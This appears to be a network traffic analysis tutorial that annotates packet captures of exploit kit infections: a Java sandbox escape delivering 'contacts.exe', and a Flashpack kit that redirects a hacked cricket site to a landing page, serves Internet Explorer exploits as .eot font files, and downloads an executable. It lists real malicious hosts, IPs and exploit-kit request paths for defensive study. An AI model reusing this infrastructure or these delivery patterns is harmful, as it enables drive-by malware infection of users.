2012-09-18 22:41:51.821007 IP 192.168.106.131.1416 > 69.194.193.34.80: Flags [P.], seq 1:264, ack 1, win 64240, length 263
E../*w@….A..j.E..”…P.<..`dv.P…a…GET /links/systems-links_warns.php?vf=0206360203&we=35353306040934370b06&r=02&pj=w&gc=r HTTP/1.1   <—- Pointer on the exploit kit server to an executable file (the GET request does not have to have .exe or .zip or anything of the sorts in it for it to be an executable request, it simply points to a location on the server.

User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_06

Host: 69.194.193.34

Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2

Connection: keep-alive

 

To confirm, we look at the servers response to the clients request:

 

2012-09-18 22:41:52.369258 IP 69.194.193.34.80 > 192.168.106.131.1416: Flags [P.], seq 1:1461, ack 264, win 64240, length 1460
E…`s……E..”..j..P..`dv..<..P…….HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 19 Sep 2012 02:42:05 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
Content-Length: 131584
X-Powered-By: PHP/5.3.14-1~dotdeb.0
Pragma: public
Expires: Wed, 19 Sep 2012 02:42:04 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename=”contacts.exe”     <—– There it is, the GET request resulted in the download of a file named “contacts.exe”
Content-Transfer-Encoding: binary

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..

 

To summarize, at this point the exploit kit was able to successfully exploit the victims machine because it was able to make it download a file without the users consent by exploiting a vulnerability in Java that allowed a break out from the sandbox and onto the victims machine. This does not mean that the victim was infected by the file or that any malware is present on the machine. Anti-virus could have easily stopped it or another host based prevention system. The file may not have even been able to install properly.

 
Flashpack Web Based Exploit Kit Exploits an Internet Explorer vulnerability 

In this scenario, the victim is using Google Translate service to view a website, the website “hitcric.info” is a legitimate website hosting live Cricket (the sport) games that has been hacked. 

 

2014-05-18 22:27:26.841394 IP 192.168.204.222.49381 > 89.46.102.34.80: Flags [P.], seq 1:430, ack 1, win 64240, length 429
E…..@….,….Y.f”…P@HD.3.:[P….k..GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://translate.google[.]com/translate_c?depth=1&hl=en&langpair=en%7Cen&rurl=translate.google[.]com&sandbox=0&u=http://hitcric[.]info/&usg=ALkJrhiGLwR0ZHj_UP5Ja9lbM5QmnYvMQg
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: hitcric[.]info
Connection: Keep-Alive

2014-05-18 22:27:27.030069 IP 89.46.102.34.80 > 192.168.204.222.49381: Flags [FP.], seq 1:520, ack 430, win 64240, length 519
E../…….BY.f”…..P..3.:[@HF.P…,]..HTTP/1.1 302 Moved Temporarily   <—- The hackers have taken over the domain name and forwarded it to a web-based exploit kit, note the “Location:” pointer 
Server: nginx admin
Date: Mon, 19 May 2014 02:13:42 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Location: http://ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com/index.php?   s=dmpuc3Nwcz1mZGlzcWJhc20mdGltZT0xNDA1MTkwMjE3OTkxMDM3NTA4JnNyYz0yOTkmc3VybD1oaXRjcmljLmluZm8mc3BvcnQ9ODAma2V5PUU0NDZEMzA2JnN1cmk9Lw==

 

The victim has now hit what is known as the “landing page”

 

2014-05-18 22:27:28.423985 IP 192.168.204.222.49383 > 95.154.246.90.80: Flags [P.], seq 1:606, ack 1, win 64240, length 605
E….’@………_..Z…P’.=.n.~cP…….GET /index.php?s=dmpuc3Nwcz1mZGlzcWJhc20mdGltZT0xNDA1MTkwMjE3OTkxMDM3NTA4JnNyYz0yOTkmc3VybD1oaXRjcmljLmluZm8mc3BvcnQ9ODAma2V5PUU0NDZEMzA2JnN1cmk9Lw== HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://translate.google[.]com/translate_c?depth=1&hl=en&langpair=en%7Cen&rurl=translate.google[.]com&sandbox=0&u=http://hitcric[.]info/&usg=ALkJrhiGLwR0ZHj_UP5Ja9lbM5QmnYvMQg
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com

2014-05-18 22:27:28.906353 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [P.], seq 1:879, ack 606, win 64240, length 878
E………c2_..Z…..P..n.~c’.@.P…e…HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:01 +0000
Content-Encoding: gzip
Vary: Accept-Encoding
PASSES BROWSER INFORMATION BACK TO EXPLOIT KIT BELOW WITH THE GET REQUEST FOR “json.php”

2014-05-18 22:27:46.874353 IP 192.168.204.222.49383 > 95.154.246.90.80: Flags [P.], seq 1806:2505, ack 47970, win 62795, length 699
E….A@….W…._..Z…P’.D.n.9.P..K.4..POST /tresting/avalonr/json.php HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com/tresting/avalonr/allow.php
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com
Content-Length: 207
Connection: Keep-Alive
Cache-Control: no-cache

id=306a617661646273696c766572666c323031346d736965387c6c6579396e6275396334633572336f69653338313969743532393935336331383035333632663931613264313662366430373166643562302e6e73312e626179616e646f766d6563692e636f6d
2014-05-18 22:27:46.874411 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [.], ack 2505, win 64240, length 0
E..(……fk_..Z…..P..n.9.’.G.P….d……..
2014-05-18 22:27:47.692844 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [P.], seq 47970:48554, ack 2505, win 64240, length 584
E..p……d”_..Z…..P..n.9.’.G.P…L…HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Sends the Internet Explorer exploit in a font file .eot which is in a binary file format, note the large content length

2014-05-18 22:27:48.285586 IP 192.168.204.222.49388 > 95.154.246.90.80: Flags [P.], seq 401:686, ack 972, win 63269, length 285
E..E.[@………_..Z…PcS%&g^w6P..%….GET /tresting/avalonr/include/add8dc99221ed3fa474c85b43f3262ed.eot HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com
Connection: Keep-Alive
2014-05-18 22:27:48.599716 IP 95.154.246.90.80 > 192.168.204.222.49388: Flags [P.], seq 972:2240, ack 686, win 64240, length 1268
E………aH_..Z…..P..g^w6cS&CP….c..HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:48 GMT
Content-Type: application/octet-stream   <—- MIME type for a binary file
Content-Length: 22319

 

First exploit appears to have failed, here is another exploit attempt with a different exploit for Internet Explorer:
2014-05-18 22:27:52.038864 IP 192.168.204.222.49388 > 95.154.246.90.80: Flags [P.], seq 686:842, ack 23546, win 64240, length 156
E….d@….S…._..Z…PcS&Cg^.dP…….GET /tresting/avalonr/include/1f55ea0e76576767cbd3d4e266e5dacf.eot HTTP/1.1
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com
Cache-Control: no-cache

2014-05-18 22:27:52.038923 IP 95.154.246.90.80 > 192.168.204.222.49388: Flags [.], ack 842, win 64240, length 0
E..(.+….f(_..Z…..P..g^.dcS&.P…O5……..
2014-05-18 22:27:52.327008 IP 95.154.246.90.80 > 192.168.204.222.49388: Flags [P.], seq 23546:24814, ack 842, win 64240, length 1268
E….,….a3_..Z…..P..g^.dcS&.P…….HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:52 GMT
Content-Type: application/octet-stream
Content-Length: 13312
Connection: keep-alive
Last-Modified: Mon, 19 May 2014 02:25:29 GMT
ETag: “53796b99-3400″
Accept-Ranges: bytes

tc.9:999=999..99.9999999y99999999999999999999999999999999999.9997&.79.0…8u..mQPJ.IKV^KXT.ZXWWVM.[\.KLW.PW.}vj.TV]\.443.9999999..1…_C.._C.._C..^C.._C…C.._C…C.._C…C.._C…C.._C..?C.._C…C.._CkPZQ.._C9999999999999999i|99u8=9..;q99999999.97.28>39.9991999999 +999)999y9999P`9)999;99<989<989=99999999I999=99..99:99=99=99)9999)99)999999)999i.99V999a.99A9999i999=9999999999999999999Y99E899.)99%99999999999999999999999999999999999A;99.9999)99.999999999999999999999999999.M\AM999..999)999.999=99999999999999.99Y.]XMX999)9999y999;999.99999999999999y99..KJKZ9999=999i999=999.99999999999999y99y.K\UVZ99.8999Y999;999.99999999999999y99{..;q.999..;qz999..;qi989..;qd999″.;q^999(.;qK99999999999TJOZKM.]UU9x}oxip ..]UU9r|kw|u ..]UU9wm}uu.}uu9lj|k ..]UU9jq|uu ..]UU9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999

 

BOOM……this exploit has succeeded, the GET request for “loadsilver.php” is actually a pointer to a place on the exploit kit server for the file “e53796b9e8cb041400466334.exe” and as you can see below, another successful exploitation. Note: There is no discussion of malware here because there is no “callback” and in this example the executable fails to install properly as anti-virus quarantined the executable upon download (not that you could see that from network traffic).
2014-05-18 22:27:53.049638 IP 192.168.204.222.49391 > 95.154.246.90.80: Flags [P.], seq 1:343, ack 1, win 64240, length 342
E..~.u@………_..Z…P@)g.)m..P…=l..GET /tresting/avalonr/loadsilver.php HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com
Connection: Keep-Alive

2014-05-18 22:27:53.049647 IP 95.154.246.90.80 > 192.168.204.222.49391: Flags [.], ack 343, win 64240, length 0
E..(.?….f._..Z…..P..)m..@)i!P…0………
2014-05-18 22:27:53.257927 IP 95.154.246.90.80 > 192.168.204.222.49391: Flags [P.], seq 1:1269, ack 343, win 64240, length 1268
E….@….a._..Z…..P..)m..@)i!P….L..HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:53 GMT
Content-Type: application/octet-stream
Content-Length: 94514
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Accept-Ranges: bytes
Content-Disposition: inline; filename=e53796b9e8cb041400466334.exe

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..

Share Button